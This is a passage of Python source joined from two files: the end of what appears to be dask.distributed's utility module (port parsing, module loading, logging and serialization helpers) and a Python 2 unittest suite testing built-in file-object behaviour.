s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path: str):
"""Loads modules for a file (.py, .zip, .egg)"""
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import: list[str] = []
tmp_python_path: str | None = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded: list[ModuleType] = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
"""Number of bytes of a frame or memoryview"""
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def json_load_robust(fn, load=json.load):
"""Reads a JSON file from disk that may be being written as we read"""
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
"""A logging.Handler that records records into a deque"""
_instances: ClassVar[weakref.WeakSet[DequeHandler]] = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = {
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
}
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def _iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@functools.lru_cache(None)
def _iscoroutinefunction_cached(f):
return _iscoroutinefunction(f)
def iscoroutinefunction(f):
# Attempt to use lru_cache version and fall back to non-cached version if needed
try:
return _iscoroutinefunction_cached(f)
except TypeError: # unhashable type
return _iscoroutinefunction(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > _parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
[8787]
or a string:
>>> parse_ports("8787")
[8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
[8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
[None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"{port_start=} and {port_stop=}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
"""A container for newline-delimited string of log entries"""
def _repr_html_(self):
return get_template("log.html.j2").render(log=self)
class Logs(dict):
"""A container for a dict mapping names to strings of log entries"""
def _repr_html_(self):
return get_template("logs.html.j2").render(logs=self)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (that is, arguments that
are not part of Worker class), such as nworkers from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
from dask.utils import typename
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
f"Class {typename(cls)} does not support keyword {k}"
)
else:
raise ValueError(
f"Module {typename(cmd)} does not support keyword {k}"
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
(["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()), []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin") # doctest: +SKIP
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
# Retain context vars while deserializing; see https://bugs.python.org/issue34014
context = contextvars.copy_context()
return await loop.run_in_executor(
_offload_executor, lambda: context.run(fn, *args, **kwargs)
)
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
def clean_dashboard_address(addrs: AnyType, default_listen_ip: str = "") -> list[dict]:
"""
Examples
--------
>>> clean_dashboard_address(8787)
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address(":8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("foo:8787")
[{'address': 'foo', 'port': 8787}]
>>> clean_dashboard_address([8787, 8887])
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
>>> clean_dashboard_address(":8787,:8887")
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
if isinstance(addrs, str):
addrs = addrs.split(",")
if not isinstance(addrs, list):
addrs = [addrs]
addresses = []
for addr in addrs:
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
addresses.append({"address": host, "port": port})
return addresses
_deprecations = {
"deserialize_for_cli": "dask.config.deserialize",
"serialize_for_cli": "dask.config.serialize",
"format_bytes": "dask.utils.format_bytes",
"format_time": "dask.utils.format_time",
"funcname": "dask.utils.funcname",
"parse_bytes": "dask.utils.parse_bytes",
"parse_timedelta": "dask.utils.parse_timedelta",
"typename": "dask.utils.typename",
"tmpfile": "dask.utils.tmpfile",
}
def __getattr__(name):
if name in _deprecations:
use_instead = _deprecations[name]
warnings.warn(
f"{name} is deprecated and will be removed in a future release. "
f"Please use {use_instead} instead.",
category=FutureWarning,
stacklevel=2,
)
return import_term(use_instead)
else:
raise AttributeError(f"module {__name__} has no attribute {name}")
# Used internally by recursive_to_dict to stop infinite recursion. If an object has
# already been encountered, a string representation will be returned instead. This is
# necessary since we have multiple cyclic referencing data structures.
_recursive_to_dict_seen: ContextVar[set[int]] = ContextVar("_recursive_to_dict_seen")
_to_dict_no_nest_flag = False
def recursive_to_dict(
obj: AnyType, *, exclude: Container[str] = (), members: bool = False
) -> AnyType:
"""Recursively convert arbitrary Python objects to a JSON-serializable
representation. This is intended for debugging purposes only.
The following objects are supported:
list, tuple, set, frozenset, deque, dict, dict_keys, dict_values
Descended into these objects recursively. Python-specific collections are
converted to JSON-friendly variants.
Classes that define ``_to_dict(self, *, exclude: Container[str] = ())``:
Call the method and dump its output
Classes that define ``_to_dict_no_nest(self, *, exclude: Container[str] = ())``:
Like above, but prevents nested calls (see below)
Other Python objects
Dump the output of ``repr()``
Objects already encountered before, regardless of type
Dump the output of ``repr()``. This breaks circular references and shortens the
output.
Parameters
----------
exclude:
A list of attribute names to be excluded from the dump.
This will be forwarded to the objects ``_to_dict`` methods and these methods
are required to accept this parameter.
members:
If True, convert the top-level Python object to a dict of its public members
**``_to_dict_no_nest`` vs. ``_to_dict``**
The presence of the ``_to_dict_no_nest`` method signals ``recursive_to_dict`` to
have a mutually exclusive full dict representation with other objects that also have
the ``_to_dict_no_nest``, regardless of their class. Only the outermost object in a
nested structure has the method invoked; all others are
dumped as their string repr instead, even if they were not encountered before.
Example:
.. code-block:: python
>>> class Person:
... def __init__(self, name):
... self.name = name
... self.children = []
... self.pets = []
...
... def _to_dict_no_nest(self, exclude=()):
... return recursive_to_dict(self.__dict__, exclude=exclude)
...
... def __repr__(self):
... return self.name
>>> class Pet:
... def __init__(self, name):
... self.name = name
... self.owners = []
...
... def _to_dict_no_nest(self, exclude=()):
... return recursive_to_dict(self.__dict__, exclude=exclude)
...
... def __repr__(self):
... return self.name
>>> alice = Person("Alice")
>>> bob = Person("Bob")
>>> charlie = Pet("Charlie")
>>> alice.children.append(bob)
>>> alice.pets.append(charlie)
>>> bob.pets.append(charlie)
>>> charlie.owners[:] = [alice, bob]
>>> recursive_to_dict({"people": [alice, bob], "pets": [charlie]})
{
"people": [
{"name": "Alice", "children": ["Bob"], "pets": ["Charlie"]},
{"name": "Bob", "children": [], "pets": ["Charlie"]},
],
"pets": [
{"name": "Charlie", "owners": ["Alice", "Bob"]},
],
}
If we changed the methods to ``_to_dict``, the output would instead be:
.. code-block:: python
{
"people": [
{
"name": "Alice",
"children": [
{
"name": "Bob",
"children": [],
"pets": [{"name": "Charlie", "owners": ["Alice", "Bob"]}],
},
],
pets: ["Charlie"],
],
"Bob",
],
"pets": ["Charlie"],
}
Also notice that, if in the future someone will swap the creation of the
``children`` and ``pets`` attributes inside ``Person.__init__``, the output with
``_to_dict`` will change completely whereas the one with ``_to_dict_no_nest`` won't!
"""
if isinstance(obj, (int, float, bool, str)) or obj is None:
return obj
if isinstance(obj, (type, bytes)):
return repr(obj)
if members:
obj = {
k: v
for k, v in inspect.getmembers(obj)
if not k.startswith("_") and k not in exclude and not callable(v)
}
# Prevent infinite recursion
try:
seen = _recursive_to_dict_seen.get()
except LookupError:
seen = set()
seen = seen.copy()
tok = _recursive_to_dict_seen.set(seen)
try:
if id(obj) in seen:
return repr(obj)
if hasattr(obj, "_to_dict_no_nest"):
global _to_dict_no_nest_flag
if _to_dict_no_nest_flag:
return repr(obj)
seen.add(id(obj))
_to_dict_no_nest_flag = True
try:
return obj._to_dict_no_nest(exclude=exclude)
finally:
_to_dict_no_nest_flag = False
seen.add(id(obj))
if hasattr(obj, "_to_dict"):
return obj._to_dict(exclude=exclude)
if isinstance(obj, (list, tuple, set, frozenset, deque, KeysView, ValuesView)):
return [recursive_to_dict(el, exclude=exclude) for el in obj]
if isinstance(obj, dict):
res = {}
for k, v in obj.items():
k = recursive_to_dict(k, exclude=exclude)
v = recursive_to_dict(v, exclude=exclude)
try:
res[k] = v
except TypeError:
res[str(k)] = v
return res
return repr(obj)
finally:
tok.var.reset(tok)
|
test_file2k.py
|
import sys
import os
import unittest
import itertools
import time
from array import array
from weakref import proxy
try:
import threading
except ImportError:
threading = None
from test import test_support
from test.test_support import TESTFN, run_unittest
from UserList import UserList
class AutoFileTests(unittest.TestCase):
# file tests for which a test file is automatically set up
def setUp(self):
self.f = open(TESTFN, 'wb')
def tearDown(self):
if self.f:
self.f.close()
os.remove(TESTFN)
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testWeakRefs(self):
# verify weak references
p = proxy(self.f)
p.write('teststring')
self.assertEqual(self.f.tell(), p.tell())
self.f.close()
self.f = None
self.assertRaises(ReferenceError, getattr, p, 'tell')
def testAttributes(self):
# verify expected attributes exist
f = self.f
with test_support.check_py3k_warnings():
softspace = f.softspace
f.name # merely shouldn't blow up
f.mode # ditto
f.closed # ditto
with test_support.check_py3k_warnings():
# verify softspace is writable
f.softspace = softspace # merely shouldn't blow up
# verify the others aren't
for attr in 'name', 'mode', 'closed':
self.assertRaises((AttributeError, TypeError), setattr, f, attr, 'oops')
def testReadinto(self):
# verify readinto
self.f.write('12')
self.f.close()
a = array('c', 'x'*10)
self.f = open(TESTFN, 'rb')
n = self.f.readinto(a)
self.assertEqual('12', a.tostring()[:n])
def testWritelinesUserList(self):
# verify writelines with instance sequence
l = UserList(['1', '2'])
self.f.writelines(l)
self.f.close()
self.f = open(TESTFN, 'rb')
buf = self.f.read()
self.assertEqual(buf, '12')
def testWritelinesIntegers(self):
# verify writelines with integers
self.assertRaises(TypeError, self.f.writelines, [1, 2, 3])
def testWritelinesIntegersUserList(self):
# verify writelines with integers in UserList
l = UserList([1,2,3])
self.assertRaises(TypeError, self.f.writelines, l)
def testWritelinesNonString(self):
# verify writelines with non-string object
class NonString:
pass
self.assertRaises(TypeError, self.f.writelines,
[NonString(), NonString()])
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testRepr(self):
# verify repr works
self.assertTrue(repr(self.f).startswith("<open file '" + TESTFN))
# see issue #14161
# Windows doesn't like \r\n\t" in the file name, but ' is ok
fname = 'xx\rxx\nxx\'xx"xx' if sys.platform != "win32" else "xx'xx"
with open(fname, 'w') as f:
self.addCleanup(os.remove, fname)
self.assertTrue(repr(f).startswith(
"<open file %r, mode 'w' at" % fname))
def testErrors(self):
self.f.close()
self.f = open(TESTFN, 'rb')
f = self.f
self.assertEqual(f.name, TESTFN)
self.assertTrue(not f.isatty())
self.assertTrue(not f.closed)
self.assertRaises(TypeError, f.readinto, "")
f.close()
self.assertTrue(f.closed)
def testMethods(self):
methods = ['fileno', 'flush', 'isatty', 'next', 'read', 'readinto',
'readline', 'readlines', 'seek', 'tell', 'truncate',
'write', '__iter__']
deprecated_methods = ['xreadlines']
if sys.platform.startswith('atheos'):
methods.remove('truncate')
# __exit__ should close the file
self.f.__exit__(None, None, None)
self.assertTrue(self.f.closed)
for methodname in methods:
method = getattr(self.f, methodname)
# should raise on closed file
self.assertRaises((TypeError, ValueError), method)
with test_support.check_py3k_warnings():
for methodname in deprecated_methods:
method = getattr(self.f, methodname)
self.assertRaises(ValueError, method)
self.assertRaises(ValueError, self.f.writelines, [])
# file is closed, __exit__ shouldn't do anything
self.assertEqual(self.f.__exit__(None, None, None), None)
# it must also return None if an exception was given
try:
1 // 0
except:
self.assertEqual(self.f.__exit__(*sys.exc_info()), None)
def testReadWhenWriting(self):
self.assertRaises(IOError, self.f.read)
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testNastyWritelinesGenerator(self):
def nasty():
for i in range(5):
if i == 3:
self.f.close()
yield str(i)
self.assertRaises(ValueError, self.f.writelines, nasty())
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testIssue5677(self):
# Remark: Do not perform more than one test per open file,
# since that does NOT catch the readline error on Windows.
data = 'xxx'
for mode in ['w', 'wb', 'a', 'ab']:
for attr in ['read', 'readline', 'readlines']:
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, getattr(self.f, attr))
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, lambda: [line for line in self.f])
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, self.f.readinto, bytearray(len(data)))
self.f.close()
for mode in ['r', 'rb', 'U', 'Ub', 'Ur', 'rU', 'rbU', 'rUb']:
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.write, data)
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.writelines, [data, data])
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.truncate)
self.f.close()
class OtherFileTests(unittest.TestCase):
def testOpenDir(self):
this_dir = os.path.dirname(__file__) or os.curdir
for mode in (None, "w"):
try:
if mode:
f = open(this_dir, mode)
else:
f = open(this_dir)
except IOError as e:
self.assertEqual(e.filename, this_dir)
else:
self.fail("opening a directory didn't raise an IOError")
def testModeStrings(self):
# check invalid mode strings
for mode in ("", "aU", "wU+"):
try:
f = open(TESTFN, mode)
except ValueError:
pass
else:
f.close()
self.fail('%r is an invalid file mode' % mode)
# Some invalid modes fail on Windows, but pass on Unix
# Issue3965: avoid a crash on Windows when filename is unicode
for name in (TESTFN, unicode(TESTFN), unicode(TESTFN + '\t')):
try:
f = open(name, "rr")
except (IOError, ValueError):
pass
else:
f.close()
def testStdin(self):
# This causes the interpreter to exit on OSF1 v5.1.
if sys.platform != 'osf1V5':
self.assertRaises(IOError, sys.stdin.seek, -1)
else:
print >>sys.__stdout__, (
' Skipping sys.stdin.seek(-1), it may crash the interpreter.'
' Test manually.')
self.assertRaises(IOError, sys.stdin.truncate)
def testUnicodeOpen(self):
# verify repr works for unicode too
f = open(unicode(TESTFN), "w")
self.assertTrue(repr(f).startswith("<open file u'" + TESTFN))
f.close()
os.unlink(TESTFN)
def testBadModeArgument(self):
# verify that we get a sensible error message for bad mode argument
bad_mode = "qwerty"
try:
f = open(TESTFN, bad_mode)
except ValueError, msg:
if msg.args[0] != 0:
s = str(msg)
if TESTFN in s or bad_mode not in s:
self.fail("bad error message for invalid mode: %s" % s)
# if msg.args[0] == 0, we're probably on Windows where there may
# be no obvious way to discover why open() failed.
else:
f.close()
self.fail("no error for invalid mode: %s" % bad_mode)
def testSetBufferSize(self):
# make sure that explicitly setting the buffer size doesn't cause
# misbehaviour especially with repeated close() calls
for s in (-1, 0, 1, 512):
try:
f = open(TESTFN, 'w', s)
f.write(str(s))
f.close()
f.close()
f = open(TESTFN, 'r', s)
d = int(f.read())
f.close()
f.close()
except IOError, msg:
self.fail('error setting buffer size %d: %s' % (s, str(msg)))
self.assertEqual(d, s)
def testTruncateOnWindows(self):
os.unlink(TESTFN)
def bug801631():
# SF bug <http://www.python.org/sf/801631>
# "file.truncate fault on windows"
f = open(TESTFN, 'wb')
f.write('12345678901') # 11 bytes
f.close()
f = open(TESTFN,'rb+')
data = f.read(5)
if data != '12345':
self.fail("Read on file opened for update failed %r" % data)
if f.tell() != 5:
self.fail("File pos after read wrong %d" % f.tell())
f.truncate()
if f.tell() != 5:
self.fail("File pos after ftruncate wrong %d" % f.tell())
f.close()
size = os.path.getsize(TESTFN)
if size != 5:
self.fail("File size after ftruncate wrong %d" % size)
try:
bug801631()
finally:
os.unlink(TESTFN)
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testIteration(self):
# Test the complex interaction when mixing file-iteration and the
# various read* methods. Ostensibly, the mixture could just be tested
# to work when it should work according to the Python language,
# instead of fail when it should fail according to the current CPython
# implementation. People don't always program Python the way they
# should, though, and the implemenation might change in subtle ways,
# so we explicitly test for errors, too; the test will just have to
# be updated when the implementation changes.
dataoffset = 16384
filler = "ham\n"
assert not dataoffset % len(filler), \
"dataoffset must be multiple of len(filler)"
nchunks = dataoffset // len(filler)
testlines = [
"spam, spam and eggs\n",
"eggs, spam, ham and spam\n",
"saussages, spam, spam and eggs\n",
"spam, ham, spam and eggs\n",
"spam, spam, spam, spam, spam, ham, spam\n",
"wonderful spaaaaaam.\n"
]
methods = [("readline", ()), ("read", ()), ("readlines", ()),
("readinto", (array("c", " "*100),))]
try:
# Prepare the testfile
bag = open(TESTFN, "w")
bag.write(filler * nchunks)
bag.writelines(testlines)
bag.close()
# Test for appropriate errors mixing read* and iteration
for methodname, args in methods:
f = open(TESTFN)
if f.next() != filler:
self.fail, "Broken testfile"
meth = getattr(f, methodname)
try:
meth(*args)
except ValueError:
pass
else:
self.fail("%s%r after next() didn't raise ValueError" %
(methodname, args))
f.close()
# Test to see if harmless (by accident) mixing of read* and
# iteration still works. This depends on the size of the internal
# iteration buffer (currently 8192,) but we can test it in a
# flexible manner. Each line in the bag o' ham is 4 bytes
# ("h", "a", "m", "\n"), so 4096 lines of that should get us
# exactly on the buffer boundary for any power-of-2 buffersize
# between 4 and 16384 (inclusive).
f = open(TESTFN)
for i in range(nchunks):
f.next()
testline = testlines.pop(0)
try:
line = f.readline()
except ValueError:
self.fail("readline() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("readline() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
buf = array("c", "\x00" * len(testline))
try:
f.readinto(buf)
except ValueError:
self.fail("readinto() after next() with supposedly empty "
"iteration-buffer failed anyway")
line = buf.tostring()
if line != testline:
self.fail("readinto() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
try:
line = f.read(len(testline))
except ValueError:
self.fail("read() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("read() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
try:
lines = f.readlines()
except ValueError:
self.fail("readlines() after next() with supposedly empty "
"iteration-buffer failed anyway")
if lines != testlines:
self.fail("readlines() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
# Reading after iteration hit EOF shouldn't hurt either
f = open(TESTFN)
try:
for line in f:
pass
try:
f.readline()
f.readinto(buf)
f.read()
f.readlines()
except ValueError:
self.fail("read* failed after next() consumed file")
finally:
f.close()
finally:
os.unlink(TESTFN)
class FileSubclassTests(unittest.TestCase):
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testExit(self):
# test that exiting with context calls subclass' close
class C(file):
def __init__(self, *args):
self.subclass_closed = False
file.__init__(self, *args)
def close(self):
self.subclass_closed = True
file.close(self)
with C(TESTFN, 'w') as f:
pass
self.assertTrue(f.subclass_closed)
@unittest.skipUnless(threading, 'Threading required for this test.')
class FileThreadingTests(unittest.TestCase):
# These tests check the ability to call various methods of file objects
# (including close()) concurrently without crashing the Python interpreter.
# See #815646, #595601
def setUp(self):
self._threads = test_support.threading_setup()
self.f = None
self.filename = TESTFN
with open(self.filename, "w") as f:
f.write("\n".join("0123456789"))
self._count_lock = threading.Lock()
self.close_count = 0
self.close_success_count = 0
self.use_buffering = False
def tearDown(self):
if self.f:
try:
self.f.close()
except (EnvironmentError, ValueError):
pass
try:
os.remove(self.filename)
except EnvironmentError:
pass
test_support.threading_cleanup(*self._threads)
def _create_file(self):
if self.use_buffering:
self.f = open(self.filename, "w+", buffering=1024*16)
else:
self.f = open(self.filename, "w+")
def _close_file(self):
with self._count_lock:
self.close_count += 1
self.f.close()
with self._count_lock:
self.close_success_count += 1
def _close_and_reopen_file(self):
self._close_file()
# if close raises an exception thats fine, self.f remains valid so
# we don't need to reopen.
self._create_file()
def _run_workers(self, func, nb_workers, duration=0.2):
with self._count_lock:
self.close_count = 0
self.close_success_count = 0
self.do_continue = True
threads = []
try:
for i in range(nb_workers):
t = threading.Thread(target=func)
t.start()
threads.append(t)
for _ in xrange(100):
time.sleep(duration/100)
with self._count_lock:
if self.close_count-self.close_success_count > nb_workers+1:
if test_support.verbose:
print 'Q',
break
time.sleep(duration)
finally:
self.do_continue = False
for t in threads:
t.join()
def _test_close_open_io(self, io_func, nb_workers=5):
def worker():
self._create_file()
funcs = itertools.cycle((
lambda: io_func(),
lambda: self._close_and_reopen_file(),
))
for f in funcs:
if not self.do_continue:
break
try:
f()
except (IOError, ValueError):
pass
self._run_workers(worker, nb_workers)
if test_support.verbose:
# Useful verbose statistics when tuning this test to take
# less time to run but still ensuring that its still useful.
#
# the percent of close calls that raised an error
percent = 100. - 100.*self.close_success_count/self.close_count
print self.close_count, ('%.4f ' % percent),
def test_close_open(self):
def io_func():
pass
self._test_close_open_io(io_func)
def test_close_open_flush(self):
def io_func():
self.f.flush()
self._test_close_open_io(io_func)
def test_close_open_iter(self):
def io_func():
list(iter(self.f))
self._test_close_open_io(io_func)
def test_close_open_isatty(self):
def io_func():
self.f.isatty()
self._test_close_open_io(io_func)
def test_close_open_print(self):
def io_func():
print >> self.f, ''
self._test_close_open_io(io_func)
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def test_close_open_print_buffered(self):
self.use_buffering = True
def io_func():
print >> self.f, ''
self._test_close_open_io(io_func)
def test_close_open_read(self):
def io_func():
self.f.read(0)
self._test_close_open_io(io_func)
def test_close_open_readinto(self):
def io_func():
a = array('c', 'xxxxx')
self.f.readinto(a)
self._test_close_open_io(io_func)
def test_close_open_readline(self):
def io_func():
self.f.readline()
self._test_close_open_io(io_func)
def test_close_open_readlines(self):
def io_func():
self.f.readlines()
self._test_close_open_io(io_func)
def test_close_open_seek(self):
def io_func():
self.f.seek(0, 0)
self._test_close_open_io(io_func)
def test_close_open_tell(self):
def io_func():
self.f.tell()
self._test_close_open_io(io_func)
def test_close_open_truncate(self):
def io_func():
self.f.truncate()
self._test_close_open_io(io_func)
def test_close_open_write(self):
def io_func():
self.f.write('')
self._test_close_open_io(io_func)
def test_close_open_writelines(self):
def io_func():
self.f.writelines('')
self._test_close_open_io(io_func)
class StdoutTests(unittest.TestCase):
def test_move_stdout_on_write(self):
# Issue 3242: sys.stdout can be replaced (and freed) during a
# print statement; prevent a segfault in this case
save_stdout = sys.stdout
class File:
def write(self, data):
if '\n' in data:
sys.stdout = save_stdout
try:
sys.stdout = File()
print "some text"
finally:
sys.stdout = save_stdout
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def test_del_stdout_before_print(self):
# Issue 4597: 'print' with no argument wasn't reporting when
# sys.stdout was deleted.
save_stdout = sys.stdout
del sys.stdout
try:
print
except RuntimeError as e:
self.assertEqual(str(e), "lost sys.stdout")
else:
self.fail("Expected RuntimeError")
finally:
sys.stdout = save_stdout
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def test_unicode(self):
import subprocess
def get_message(encoding, *code):
code = '\n'.join(code)
env = os.environ.copy()
env['PYTHONIOENCODING'] = encoding
process = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 0)
return stdout
def check_message(text, encoding, expected):
stdout = get_message(encoding,
"import sys",
"sys.stdout.write(%r)" % text,
"sys.stdout.flush()")
self.assertEqual(stdout, expected)
# test the encoding
check_message(u'15\u20ac', "iso-8859-15", "15\xa4")
check_message(u'15\u20ac', "utf-8", '15\xe2\x82\xac')
check_message(u'15\u20ac', "utf-16-le", '1\x005\x00\xac\x20')
# test the error handler
check_message(u'15\u20ac', "iso-8859-1:ignore", "15")
check_message(u'15\u20ac', "iso-8859-1:replace", "15?")
check_message(u'15\u20ac', "iso-8859-1:backslashreplace", "15\\u20ac")
# test the buffer API
for objtype in ('buffer', 'bytearray'):
stdout = get_message('ascii',
'import sys',
r'sys.stdout.write(%s("\xe9"))' % objtype,
'sys.stdout.flush()')
